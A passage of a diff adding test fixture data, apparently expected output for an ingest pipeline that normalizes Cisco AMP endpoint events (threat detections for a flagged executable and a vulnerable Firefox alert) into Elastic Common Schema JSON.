+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Audit",
+                "hostname": "Demo_AMP_Threat_Audit",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:04.469653537Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":333000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605487\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533669671340605000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "63:5f:47:2b:89:91",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "63:5f:47:2b:89:91"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533669671340605487",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:21:00.000Z",
+            "file": {
+                "name": "ekjrngjker.exe",
+                "path": "\\\\?\\C:\\ekjrngjker.exe",
+                "hash": {
+                    "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
+                    "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Audit"
+                ],
+                "hash": [
+                    "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "b99e0a8c56f963246b6464b9fffbf7a2",
+                    "b024546a49bad1bd60fccef0a5d11b55f9a442c4"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Audit",
+                "hostname": "Demo_AMP_Threat_Audit",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:04.469655428Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":195000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605486\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533669671340605000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "63:5f:47:2b:89:91",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "63:5f:47:2b:89:91"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533669671340605486",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:21:00.000Z",
+            "file": {
+                "name": "ekjrngjker.exe",
+                "path": "C:\\ekjrngjker.exe",
+                "hash": {
+                    "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
+                    "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Audit"
+                ],
+                "hash": [
+                    "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "b99e0a8c56f963246b6464b9fffbf7a2",
+                    "b024546a49bad1bd60fccef0a5d11b55f9a442c4"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Audit",
+                "user": {
+                    "name": "user@testdomain.com"
+                },
+                "hostname": "Demo_AMP_Threat_Audit"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:04.469657309Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":170000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605485\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533669671340605000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "63:5f:47:2b:89:91",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "63:5f:47:2b:89:91"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533669671340605485",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:20:59.000Z",
+            "file": {
+                "name": "ekjrngjker.exe",
+                "path": "C:\\ekjrngjker.exe",
+                "hash": {
+                    "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
+                    "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Audit"
+                ],
+                "hash": [
+                    "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "b99e0a8c56f963246b6464b9fffbf7a2",
+                    "b024546a49bad1bd60fccef0a5d11b55f9a442c4"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Audit",
+                "user": {
+                    "name": "user@testdomain.com"
+                },
+                "hostname": "Demo_AMP_Threat_Audit"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:04.469659269Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669667045638000,\"timestamp\":1610706059,\"timestamp_nanoseconds\":779000000,\"date\":\"2021-01-15T10:20:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669667045638188\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533669667045638000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "63:5f:47:2b:89:91",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "63:5f:47:2b:89:91"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533669667045638188",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "hash": {
+                    "sha256": "0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"
+                }
+            },
+            "@timestamp": "2021-01-15T10:20:00.000Z",
+            "file": {
+                "name": "firefox.exe",
+                "hash": {
+                    "sha256": "4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP_Exploit_Prevention"
+                ],
+                "hash": [
+                    "4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Exploit_Prevention",
+                "hostname": "Demo_AMP_Exploit_Prevention"
+            },
+            "event": {
+                "severity": 1,
+                "ingested": "2021-09-12T17:31:04.469661163Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":15210587194928,\"timestamp\":1610706000,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-15T10:20:00+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610706000,\"start_date\":\"2021-01-15T10:20:00+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f5:8f:96:c3:53:1c\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"firefox.exe\",\"identity\":{\"sha256\":\"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}},\"vulnerabilities\":[{\"name\":\"Mozilla Firefox\",\"version\":\"41.0\",\"cve\":\"CVE-2015-7204\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204\"}]}}",
+                "kind": "alert",
+                "start": "2021-01-15T10:20:00.000Z",
+                "action": "Vulnerable Application Detected",
+                "id": "15210587194928",
+                "category": [
+                    "file"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "f5:8f:96:c3:53:1c",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Clean",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "f5:8f:96:c3:53:1c"
+                        ],
+                        "cve": [
+                            "CVE-2015-7204"
+                        ]
+                    },
+                    "vulnerabilities": [
+                        {
+                            "name": "Mozilla Firefox",
+                            "score": "6.8",
+                            "cve": "CVE-2015-7204",
+                            "version": "41.0",
+                            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204"
+                        }
+                    ],
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 1107296279
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:19:59.000Z",
+            "file": {
+                "name": "ekjrngjker.exe",
+                "path": "\\\\?\\C:\\ekjrngjker.exe",
+                "hash": {
+                    "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
+                    "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Audit"
+                ],
+                "hash": [
+                    "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "b99e0a8c56f963246b6464b9fffbf7a2",
+                    "b024546a49bad1bd60fccef0a5d11b55f9a442c4"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Audit",
+                "hostname": "Demo_AMP_Threat_Audit",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:04.469663071Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669409347600000,\"timestamp\":1610705999,\"timestamp_nanoseconds\":257000000,\"date\":\"2021-01-15T10:19:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669409347600427\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533669409347600000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "63:5f:47:2b:89:91",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "63:5f:47:2b:89:91"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533669409347600427",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:19:59.000Z",
+            "file": {
+                "name": "ekjrngjker.exe",
+                "path": "C:\\ekjrngjker.exe",
+                "hash": {
+                    "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
+                    "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Audit"
+                ],
+                "hash": [
+                    "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "b99e0a8c56f963246b6464b9fffbf7a2",
+                    "b024546a49bad1bd60fccef0a5d11b55f9a442c4"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Audit",
+                "user": {
+                    "name": "user@testdomain.com"
+                },
+                "hostname": "Demo_AMP_Threat_Audit"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:04.469664950Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669409347600000,\"timestamp\":1610705999,\"timestamp_nanoseconds\":240000000,\"date\":\"2021-01-15T10:19:59+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669409347600426\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533669409347600000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "63:5f:47:2b:89:91",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "63:5f:47:2b:89:91"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533669409347600426",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:19:58.000Z",
+            "file": {
+                "name": "ekjrngjker.exe",
+                "path": "C:\\ekjrngjker.exe",
+                "hash": {
+                    "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4",
+                    "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "md5": "b99e0a8c56f963246b6464b9fffbf7a2"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Audit"
+                ],
+                "hash": [
+                    "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967",
+                    "b99e0a8c56f963246b6464b9fffbf7a2",
+                    "b024546a49bad1bd60fccef0a5d11b55f9a442c4"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Audit",
+                "user": {
+                    "name": "user@testdomain.com"
+                },
+                "hostname": "Demo_AMP_Threat_Audit"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:04.469666839Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669405052633000,\"timestamp\":1610705998,\"timestamp_nanoseconds\":847000000,\"date\":\"2021-01-15T10:19:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669405052633129\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6533669405052633000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "63:5f:47:2b:89:91",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "63:5f:47:2b:89:91"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6533669405052633129",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-15T10:18:58.000Z",
+            "file": {
+                "name": "ekjrngjker.exe",
